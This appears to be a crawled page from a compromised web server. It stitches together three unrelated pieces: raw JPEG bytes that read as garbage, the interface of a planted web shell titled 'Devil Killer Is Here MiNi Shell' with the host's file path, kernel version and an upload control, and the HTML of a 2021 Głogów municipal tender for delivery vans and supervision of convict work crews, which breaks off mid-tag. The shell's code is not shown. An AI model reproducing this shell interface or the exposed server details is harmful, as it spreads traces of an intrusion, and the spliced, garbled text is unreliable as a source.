JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211104/0025729801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wynajem aut dostawczych wraz z obsługą oraz nadzór nad grupą skazanych i pracowników interwencyjnych – cześć I, II, III, IV, V, VI” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Głogów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 390647297</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Głogów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">67-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL516 - Legnicko-głogowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">76 7265527</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bzp@glogow.um.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.glogow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wynajem aut dostawczych wraz z obsługą oraz nadzór nad grupą skazanych i pracowników interwencyjnych – cześć I, II, III, IV, V, VI” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-659ddfd2-3d61-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00257298</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003361/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Wynajem aut dostawczych wraz z obsługą oraz nadzór nad grupą skazanych i pracowników interwencyjnych - część I, II, III, IV, V, VI</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://glogow-um.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://glogow-um.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)zgłoszenie do postępowania wymaga zalogowania wykonawcy do systemu<br/>https://glogow-um.ezamawiajacy.pl , www.glogow.bip.info.pl. (przez Biuletyn Informacji Publicznej<br/>zakładka „Zamówienia publiczne”, Platforma zakupowa MarketPlanet); 2) wykonawca po wybraniu<br/>opcji „Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta.<br/>Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia<br/>hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie<br/>„zarejestruj się”;3) rejestracja wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym<br/>zamawiający zaleca wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie<br/>złożenia oferty w postaci elektronicznej; wykonawca wraz z potwierdzeniem złożenia wniosku<br/>rejestracyjnego otrzyma informację, o możliwości przyspieszenia procedury założenia konta, wówczas<br/>należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu; 4)po założeniu konta<br/>wykonawca ma możliwość złożenia oferty w postępowaniu; komunikacja między zamawiającym a<br/>wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie<br/>elektronicznej za pośrednictwem platformy zakupowej; za datę przekazania zaświadczeń oraz<br/>informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki „korespondencja”;5)wykonawca<br/>może zwrócić się do zamawiającego o wyjaśnienie treści SWZ. Wniosek należy przesłać za<br/>pośrednictwem platformy zakupowej przez opcję „zadaj pytanie” lub przy użyciu zakładki<br/>„korespondencja”. W celu zadania pytania zamawiającemu, wykonawca klika lewym przyciskiem<br/>myszy klawisz ZADAJ PYTANIE; powoduje to otwarcie okna, w którym należy uzupełnić dane<br/>Wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z wymaganym<br/>kodem weryfikującym z obrazka, klika klawisz POTWIERDŹ. Wykonawca uzyskuje potwierdzenie<br/>wysłania pytania poprzez komunikat systemowy &#34;pytanie wysłane&#34;.6)Zamawiający informuje, iż w<br/>przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z PlatformyWykonawcawinien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa<br/>Głogów tel.<br/>+48 22 2572224 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail:<br/>oneplace@marketplanet.pl;7)Zamawiający zgodnie z § 2 rozporządzenia Prezesa Rady Ministrów z<br/>dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. poz. 2452), określa<br/>dopuszczalny format podpisu elektronicznego, jako:- dokumenty w formacie „pdf&#34; - zaleca się<br/>podpisywać formatem PAdES,- dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;,<br/>wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany<br/>załączyć, prócz podpisanego dokumentu, oddzielny plik z podpisem.3.niezbędne wymagania<br/>sprzętowo- aplikacyjne umożliwiające pracę na platformie zakupowej tj.:1)stały dostęp do sieci Internet<br/>o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;2)komputer klasy PC lub MAC, o<br/>następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;3)zainstalowana dowolna<br/>przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet<br/>Explorer minimalnie wersja 10.0;4)włączona obsługa JavaScript;5)zainstalowany program Acrobat<br/>Reader lub inny obsługujący pliki w formacie .pdf.4.dopuszczalne formaty przesyłanych danych: pliki o<br/>wielkości do 100 MB w txt, zgodnie z SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>􀀁􀀁􀀁􀀁 administratorem Pani/Pana danych osobowych jest Prezydent Miasta Głogowa z siedzibą w<br/>Urzędzie Miejskim w Głogowie Rynek 10, 67-200 Głogów, adres e-mail: prezydent@glogow.um.gov.pl,<br/>tel. +48 76 7265 401;<br/>􀀁􀀁􀀁􀀁 W Urzędzie Miejskim w Głogowie został wyznaczony inspektor ochrony danych osobowych<br/>tel.<br/>+48<br/>76 72 65 471, e-mail: iod@glogow.um.gov.pl;<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z postępowaniem o udzielenie zamówienia publicznego Nr BZP.271.31.2021 w trybie podstawowym ;<br/>􀀁􀀁􀀁􀀁 odbiorcami Pani/Pana danych osobowych będą:<br/>o osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18<br/>oraz art. 74 ust. 1 ustawy z dnia z dnia 11 września 2019 r. Prawo zamówień publicznych (t. j. Dz. U. z<br/>2021 r. poz. 1129), dalej „ustawa Pzp”;<br/>o osoby upoważnione przez Zamawiającego Gminę Miejską Głogów, które muszą mieć dostęp do<br/>danych,<br/>o podmioty uprawnione do uzyskania danych osobowych (np. Instytucja Zarządzająca, Instytucja<br/>Wdrażająca)<br/>o podmioty, które przetwarzają Pani/ Pana dane osobowe w imieniu Zamawiającego na podstawie<br/>zawartej umowy powierzenia przetwarzania danych osobowych (tzw. podmioty przetwarzające) jak i<br/>dostawcy usług wspierających działania Zamawiającego:<br/>􀀁􀀁􀀁􀀁 Otwarty Rynek Elektroniczny S.A. ul .Domaniewska 49, 02-672 Warszawa – podmiot<br/>udostępniający<br/>Platformę e-Zamawiający,o organy administracji publicznej(jeżeli wynika to z przepisu prawa, decyzji administracyjnej lub<br/>orzeczenia sądowego);Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy<br/>Pzp, przez okres<br/>4lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania<br/>umowyprzekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>􀀁􀀁􀀁􀀁 obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących<br/>jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>􀀁􀀁􀀁􀀁 w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>􀀁􀀁􀀁􀀁 posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6<br/>ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.271.47.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Wykonawca będzie prowadził prace w danym sektorze przy pomocy osób skazanych osadzonych w Zakładzie Karnym w Głogowie. Jednocześnie będzie pełnił nadzór nad przydzieloną grupą skazanych lub osób zatrudnionych w ramach prac interwencyjnych. Do obowiązków Wykonawcy będzie należał odbiór skazanych z Zakładu Karnego oraz odwiezienie ich do Zakładu Karnego w Głogowie po zakończeniu pracy. <br/>2. Wykonawca będzie świadczył usługi od godziny 7:00 do godziny 15:00.<br/>Kierowca obowiązany jest do pobrania skazanych z odpowiednią rezerwa czasową tak, aby przystąpić do prac od godziny 7:00. O tej porze skazani powinni być przebrani w ubranie robocze, samochód odpowiednio przygotowany i wyposażony w narzędzia niezbędne do wykonywania prac porządkowych. Zakończenie prac tj. powrót do pomieszczenia socjalnego nastąpi nie wcześniej niż o godzinie 1500.<br/>3.Pracownicy, z ramienia Wykonawcy, przed przystąpieniem do realizacji zamówienia odbędą szkolenie w zakresie dozoru nad skazanymi w Zakładzie Karnym w Głogowie i są zobowiązani przestrzegać przepisy o dozorowaniu skazanych. <br/>4. Nadzorujący zobowiązani są do prowadzenia ewidencji czasu pracy każdego skazanego. Karty pracy zapewni Zamawiający. <br/>Ostatniego dnia każdego miesiąca kierowca złoży wypełnione karty w Urzędzie Miejskim <br/>w Głogowie w Dziale Komunalnym.<br/>5. Zamawiający zapewni narzędzia niezbędne do wykonywania prac. Nadzorujący skazanych zobowiązany jest do dbania o otrzymane narzędzia. W razie kradzieży bądź zguby narzędzi Wykonawca zakupi identyczny sprzęt. <br/>6.Wykonawca będzie wywoził odpady na składowisko komunalne.<br/>7.Wykonawca może wywozić odpady na wysypisko komunalne w czasie godzin pracy .<br/>8. W razie awarii samochodu, Wykonawca zobowiązany jest zapewnić pojazd zastępczy- samochód dostawczy, skrzyniowy, 5 osobowy. Takim pojazdem może świadczyć usługi do końca danego dnia roboczego. Następnego dnia roboczego nie dopuszcza się świadczenia usług autem zastępczym.<br/>9.Wykonawca powinien zapewnić pomieszczenie socjalne, spełniające wszelkie wymogi określone w Rozporządzeniu Ministra Pracy i Polityki socjalnej w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy z dnia 26.09.1997 r. Zamawiający może dopuścić pomieszczenie socjalne do użytku, po uprzedniej akceptacji inspektora ds. BHP Urzędu Miejskiego w Głogowie. Pomieszczenie ma służyć osobom skazanym tylko i wyłącznie do schronienia się przed niekorzystnymi warunkami atmosferycznymi i jako zaplecze socjalne.<br/>10.Przerwę śniadaniową wyznacza się od godziny 10.00 do godziny 10.30. <br/>11. Wykonawca zobowiązany jest do dbania o odzież ochronną którą zapewnia Zamawiający osobom skazanym. Wykonawca ma obowiązek prania ubrań roboczych jeżeli zachodzi taka konieczność, nie rzadziej jednak niż dwa razy w miesiącu. <br/>12. Zamawiający zastrzega sobie prawo wprowadzania zmian w harmonogramie w ramach limitu godzin sprzątania, zmian ulic oraz częstotliwości.<br/>13. W sytuacji niedopuszczenia do pracy grupy skazanych , nie wynikającej z winy Wykonawcy, w celu zapewnienia ciągłości robót Zamawiający skieruje do wykonywania czynności porządkowych pracowników interwencyjnych, wykonujących prace w ramach robót publicznych.<br/>14. Rozliczenie za wykonaną pracę, bez obecności skazanych z Zakładu Karnego ale przy udziale pracowników interwencyjnych, następować będzie w okresach miesięcznych na podstawie faktury VAT i karty pracy samochodu.<br/><br/>Wykonawca do nadzoru nad skazanymi wskaże osoby, które nie były wykluczone przez Zakład Karny z możliwości świadczenia usług na rzecz Gminy Miejskiej Głogów <br/>w w /w zakresie.<br/><br/>Szczegółowy zakres zadania ( załącznik nr 12) oraz wykaz poszczególnych rejonów oraz terenów zielonych określa mapka (załącznik nr 11) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90512000-9 - Usługi transportu odpadów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Wykonawca będzie prowadził prace w danym sektorze przy pomocy osób skazanych osadzonych w Zakładzie Karnym w Głogowie. Jednocześnie będzie pełnił nadzór nad przydzieloną grupą skazanych lub osób zatrudnionych w ramach prac interwencyjnych. Do obowiązków Wykonawcy będzie należał odbiór skazanych z Zakładu Karnego oraz odwiezienie ich do Zakładu Karnego w Głogowie po zakończeniu pracy. <br/>2. Wykonawca będzie świadczył usługi od godziny 7:00 do godziny 15:00.<br/>Kierowca obowiązany jest do pobrania skazanych z odpowiednią rezerwa czasową tak, aby przystąpić do prac od godziny 7:00. O tej porze skazani powinni być przebrani w ubranie robocze, samochód odpowiednio przygotowany i wyposażony w narzędzia niezbędne do wykonywania prac porządkowych. Zakończenie prac tj. powrót do pomieszczenia socjalnego nastąpi nie wcześniej niż o godzinie 1500.<br/>3.Pracownicy, z ramienia Wykonawcy, przed przystąpieniem do realizacji zamówienia odbędą szkolenie w zakresie dozoru nad skazanymi w Zakładzie Karnym w Głogowie i są zobowiązani przestrzegać przepisy o dozorowaniu skazanych. <br/>4. Nadzorujący zobowiązani są do prowadzenia ewidencji czasu pracy każdego skazanego. Karty pracy zapewni Zamawiający. <br/>Ostatniego dnia każdego miesiąca kierowca złoży wypełnione karty w Urzędzie Miejskim <br/>w Głogowie w Dziale Komunalnym.<br/>5. Zamawiający zapewni narzędzia niezbędne do wykonywania prac. Nadzorujący skazanych zobowiązany jest do dbania o otrzymane narzędzia. W razie kradzieży bądź zguby narzędzi Wykonawca zakupi identyczny sprzęt. <br/>6.Wykonawca będzie wywoził odpady na składowisko komunalne.<br/>7.Wykonawca może wywozić odpady na wysypisko komunalne w czasie godzin pracy .<br/>8. W razie awarii samochodu, Wykonawca zobowiązany jest zapewnić pojazd zastępczy- samochód dostawczy, skrzyniowy, 5 osobowy. Takim pojazdem może świadczyć usługi do końca danego dnia roboczego. Następnego dnia roboczego nie dopuszcza się świadczenia usług autem zastępczym.<br/>9.Wykonawca powinien zapewnić pomieszczenie socjalne, spełniające wszelkie wymogi określone w Rozporządzeniu Ministra Pracy i Polityki socjalnej w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy z dnia 26.09.1997 r. Zamawiający może dopuścić pomieszczenie socjalne do użytku, po uprzedniej akceptacji inspektora ds. BHP Urzędu Miejskiego w Głogowie. Pomieszczenie ma służyć osobom skazanym tylko i wyłącznie do schronienia się przed niekorzystnymi warunkami atmosferycznymi i jako zaplecze socjalne.<br/>10.Przerwę śniadaniową wyznacza się od godziny 10.00 do godziny 10.30. <br/>11. Wykonawca zobowiązany jest do dbania o odzież ochronną którą zapewnia Zamawiający osobom skazanym. Wykonawca ma obowiązek prania ubrań roboczych jeżeli zachodzi taka konieczność, nie rzadziej jednak niż dwa razy w miesiącu. <br/>12. Zamawiający zastrzega sobie prawo wprowadzania zmian w harmonogramie w ramach limitu godzin sprzątania, zmian ulic oraz częstotliwości.<br/>13. W sytuacji niedopuszczenia do pracy grupy skazanych , nie wynikającej z winy Wykonawcy, w celu zapewnienia ciągłości robót Zamawiający skieruje do wykonywania czynności porządkowych pracowników interwencyjnych, wykonujących prace w ramach robót publicznych.<br/>14. Rozliczenie za wykonaną pracę, bez obecności skazanych z Zakładu Karnego ale przy udziale pracowników interwencyjnych, następować będzie w okresach miesięcznych na podstawie faktury VAT i karty pracy samochodu.<br/><br/>Wykonawca do nadzoru nad skazanymi wskaże osoby, które nie były wykluczone przez Zakład Karny z możliwości świadczenia usług na rzecz Gminy Miejskiej Głogów <br/>w w /w zakresie.<br/><br/>Szczegółowy zakres zadania ( załącznik nr 12) oraz wykaz poszczególnych rejonów oraz terenów zielonych określa mapka (załącznik nr 11) </p> <h3 